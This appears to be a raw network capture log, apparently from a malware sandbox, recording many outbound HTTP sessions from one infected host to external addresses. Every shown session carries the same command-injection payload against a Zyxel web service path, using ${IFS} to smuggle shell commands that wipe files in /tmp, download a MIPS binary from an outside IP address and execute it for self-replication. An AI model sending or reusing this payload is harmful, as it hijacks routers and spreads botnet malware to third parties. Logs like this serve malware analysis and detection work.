                                          Jan 14, 2024 15:46:21.100961924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5583192.168.2.2348174166.167.128.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100971937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5584192.168.2.2341168126.229.125.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100984097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5585192.168.2.2337808106.16.118.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100997925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5586192.168.2.233931652.9.252.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101023912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5587192.168.2.233438294.115.137.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101047993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5588192.168.2.2341608136.120.179.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101078987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5589192.168.2.233603898.45.75.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101089954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5590192.168.2.233838895.108.47.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101102114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5591192.168.2.2340952146.89.150.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101115942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5592192.168.2.233772212.100.56.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101183891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5593192.168.2.2339352222.86.93.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101183891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5594192.168.2.234866231.135.181.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101211071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5595192.168.2.2339876117.164.237.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101258039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5596192.168.2.233777495.117.42.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101278067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5597192.168.2.2343600129.203.67.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101311922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5598192.168.2.233358290.185.153.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101320982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5599192.168.2.2353682126.204.95.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101331949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5600192.168.2.2340688158.9.204.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101351023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5601192.168.2.233700019.158.190.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101366997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5602192.168.2.2337324124.216.153.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101392031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5603192.168.2.2357292218.163.127.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101418972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5604192.168.2.234014831.252.92.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101429939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5605192.168.2.2349778164.229.167.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101452112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5606192.168.2.233658288.212.160.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101510048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5607192.168.2.234142295.17.51.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101545095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5608192.168.2.2354220168.7.248.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101589918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5609192.168.2.2337108199.174.132.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101619959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5610192.168.2.2336828139.207.41.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101629019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5611192.168.2.2338494117.36.18.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101653099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5612192.168.2.2349916109.201.135.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101706982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5613192.168.2.2358234128.248.31.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101706982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5614192.168.2.235000649.149.68.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101749897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5615192.168.2.2360126128.207.47.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101778984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5616192.168.2.2344990109.161.238.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101778984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5617192.168.2.234048025.47.229.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101826906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5618192.168.2.235992686.162.104.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101857901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5619192.168.2.234402897.65.4.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101882935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5620192.168.2.233335653.60.240.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101932049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5621192.168.2.235385889.239.182.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101958036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5622192.168.2.2337568153.186.194.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.101963997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5623192.168.2.2351168112.183.127.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102010965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5624192.168.2.2335502217.77.200.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102025032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5625192.168.2.2347100156.149.9.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102066994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5626192.168.2.2351042171.223.94.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102066994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5627192.168.2.235963841.46.12.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102086067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5628192.168.2.2360742123.85.144.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102138996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5629192.168.2.233955854.78.245.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102147102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5630192.168.2.233506857.4.205.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.102154016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5631192.168.2.2339330151.161.244.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.104414940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5632192.168.2.235240652.225.71.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.104882002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5633192.168.2.2359304184.142.86.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.104940891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5634192.168.2.2346830185.126.208.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.104964972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5635192.168.2.234993287.66.19.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.104996920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5636192.168.2.235065841.229.139.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105021000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5637192.168.2.2336786125.164.38.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105065107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5638192.168.2.2335456195.19.47.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105118036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5639192.168.2.2333150175.131.131.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105130911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5640192.168.2.234346096.180.238.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105165005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5641192.168.2.2341852108.9.115.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.105191946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5642192.168.2.2351504150.149.70.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111550093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5643192.168.2.233500643.172.38.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111579895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5644192.168.2.2334166167.188.51.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111601114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5645192.168.2.2340916156.194.233.95443
                                          TimestampBytes transferredDirectionData
